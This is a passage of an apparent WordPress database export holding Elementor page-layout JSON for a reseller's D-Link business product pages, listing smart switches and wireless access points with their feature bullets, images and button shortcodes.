Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7635,3419,'_elementor_version','2.5.14'),(7636,3419,'_elementor_edit_mode','builder'),(7639,3420,'_wp_page_template','template-fullwidth.php'),(7640,3420,'_elementor_template_type','post'),(7641,3420,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables 